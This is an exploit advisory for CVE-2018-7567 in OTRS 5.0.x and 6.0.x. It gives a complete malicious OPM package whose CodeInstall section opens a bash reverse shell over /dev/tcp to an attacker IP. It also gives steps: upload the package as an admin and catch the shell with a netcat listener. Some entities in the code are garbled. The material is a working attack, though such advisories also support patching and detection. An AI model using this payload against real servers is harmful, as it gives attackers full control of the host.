OTRS Command Injection

`# Exploit Title: OTRS Authenticated file upload   
# Date: 03-03-2018  
# Exploit Author: Ali BawazeEer   
# Vendor Homepage: https://www.otrs.com/  
# Software Link: http://ftp.otrs.org/pub/otrs/  
# Version:5.0.2, 5.0.0 - 5.0.24, 6.0.0 - 6.0.1  
# Tested on: OTRS 5.0.2/CentOS 7.2.1511  
# CVE : CVE-2018-7567  
  
# Vulnerability Description:   
authenticated admins are able to exploit a Blind Remote Code Execution vulnerability by loading a crafted malicious opm file with an embedded codeinstall tag to execute a command on the server during package installation.  
aC/ Proof opm file to upload   
  
<?xml version="1.0" encoding="utf-8" ?>  
<otrs_package version="1.1">  
<Name>MyModule</Name>  
<Version>1.0.0</Version>  
<Vendor>My Module</Vendor>  
<URL>http://otrs.org/</URL>  
<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>  
<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>  
<Description Lang="en">MyModule</Description>  
<Framework>5.x.x</Framework>  
<BuildDate>2016-09-23 11:17:41</BuildDate>  
<BuildHost>opms.otrs.com</BuildHost>  
<Framework>5.0.x</Framework>  
<IntroInstall Lang="en" Title="My Module" type="pre">  
<br>  
Hello wolrd  
<br>  
((Hello!))  
<br&gt  
</IntroInstall>  
<CodeInstall type="pre">  
print qx(bash -i >& /dev/tcp/192.168.56.102/443 0>&1 &);  
</CodeInstall>  
<CodeInstall Type="post">  
# create the package name  
my $CodeModule = 'var::packagesetup::' . $Param{Structure}->{Name}->{Content};  
$Kernel::OM->Get($ModeModule)-%gt;CodeInstall();  
</CodeInstall>  
<CodeUninstall type="pre">  
my $CodeModule = 'var::packagesetup::' . $Param{Structure}-%gt;{Name}-%gt;{Content};  
$Kernel::OM->Get($CodeModule)->CodeUninstall();  
</CodeUninstall>  
</otrs_package>  
  
  
- Steps:  
- Go to package manager from administrator panel   
- Save the above code in opm file and upload it as package   
- change the ip address to your attacking machine and setup netcat listener   
  
  
  
# =================================================EOF =======================================================  
#  
#  
# Risk : attackers are able to gain full access to the server after uploading malicious opm file   
# and thus have total control over the web server ,   
#  
# Vulnerability Limitation : Admin access needed to escalate the privilege from application level to control the server   
#  
# ========================================================  
# [+] Disclaimer  
#  
# Permission is hereby granted for the redistribution of this advisory,  
# provided that it is not altered except by reformatting it, and that due  
# credit is given. Permission is explicitly given for insertion in  
# vulnerability databases and similar, provided that due credit is given to  
# the author. The author is not responsible for any misuse of the information contained   
# herein and prohibits any malicious use of all security related information  
# or exploits by the author or elsewhere.  
#  
#  
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #  
  
[+] Exploit by: Ali BawazeEer  
[+] Twitter:@AlibawazeEer  
[+] Linkedin : https://www.linkedin.com/in/AliBawazeEer  
`